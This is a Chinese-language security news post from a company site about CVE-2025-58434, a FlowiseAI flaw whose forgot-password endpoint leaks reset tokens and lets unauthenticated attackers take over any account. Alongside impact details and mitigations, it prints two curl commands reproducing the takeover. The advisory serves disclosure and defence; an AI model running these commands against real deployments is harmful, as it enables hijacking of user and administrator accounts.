公司动态
高危漏洞!攻击者可无认证接管任意账户!
时间:2025-09-16浏览次数:
近日,广泛用于构建AI代理和大语言模型(LLM)工作流的开源生成式AI开发平台FlowiseAI被曝存在一个高危安全漏洞(CVE-2025-58434),攻击者

image.png




近日,广泛用于构建AI代理和大语言模型(LLM)工作流的开源生成式AI开发平台FlowiseAI被曝存在一个高危安全漏洞(CVE-2025-58434),攻击者可在未通过身份认证的情况下,直接接管云环境及本地部署环境中的任意用户账户,包括管理员账户。

根据安全公告,该漏洞的CVSS评分为9.8分(高危级别),源于平台的密码重置机制设计缺陷。具体而言,FlowiseAI的密码找回端点(/api/v1/account/forgot-password)在未经任何认证或验证的情况下,直接返回包含有效密码重置临时令牌(tempToken)在内的敏感用户信息。攻击者可以利用这一缺陷,为任意用户生成重置令牌并直接修改其密码,最终实现完全账户接管(ATO)。

技术分析显示,攻击者仅需向该API端点提交目标用户的邮箱地址,系统便会返回以下敏感信息:

  • 用户ID、姓名、邮箱及凭证哈希值

  • 账户状态和相关时间戳

  • 有效的密码重置临时令牌及其有效期

安全公告特别指出,攻击者在获取tempToken后,可立即调用密码重置端点(/api/v1/account/reset-password)修改用户密码,整个过程无需邮件验证或用户交互。由于邮箱地址通常可通过猜测或公开渠道获取,未认证攻击者能够轻易接管包括管理员在内的高权限账户。

攻击复现过程如下:

获取重置令牌

bash
curl -i -X POST https://<目标地址>/api/v1/account/forgot-password \-H "Content-Type: application/json" \-d '{"user":{"email":"victim@example.com"}}'

响应中将直接返回有效tempToken。

利用令牌重置密码

bash
curl -i -X POST https://<目标地址>/api/v1/account/reset-password \-H "Content-Type: application/json" \-d '{ "user":{ "email":"victim@example.com", "tempToken":"获取的临时令牌", "password":"新密码" } }'

返回200状态码即表示密码修改成功。

该漏洞被归类为“认证绕过/不安全的直接对象引用”,具体影响包括:

  • 实现完全账户接管,包括高权限管理员账户;

  • 导致敏感数据泄露与身份冒用,攻击者可访问组织关键资产;

  • 攻击无需用户交互,大幅降低利用门槛;

  • 同时影响云托管与本地部署环境,扩大了潜在威胁范围。

安全公告警告,由于漏洞利用无需任何前置条件,极有可能被攻击者大规模利用。

目前,FlowiseAI尚未发布官方补丁,3.0.5之前的所有版本均受影响。建议用户采取以下临时缓解措施:

  • 禁止API响应返回重置令牌等敏感信息;

  • 确保令牌仅通过安全邮件渠道传递;

  • 返回通用成功消息,避免通过响应差异进行用户枚举;

  • 实施单次有效、短生命周期且绑定请求源的令牌机制;

  • 记录并监控所有密码重置请求;

  • 为高权限账户启用多因素认证(MFA)。

在官方修复版本发布前,管理员应严格限制漏洞端点暴露,加强对密码重置操作的监控,并积极实施临时安全配置,以降低攻击风险。


Copyright © 2002-2022 马斯克(上海)数字科技有限公司 版权所有  备案号:沪ICP备2022027519号-1  
地址:中国上海市闵行区光华路598号2幢3、4层  邮箱:andy.wang@musk-china.cn  电话:(021) 5220 9661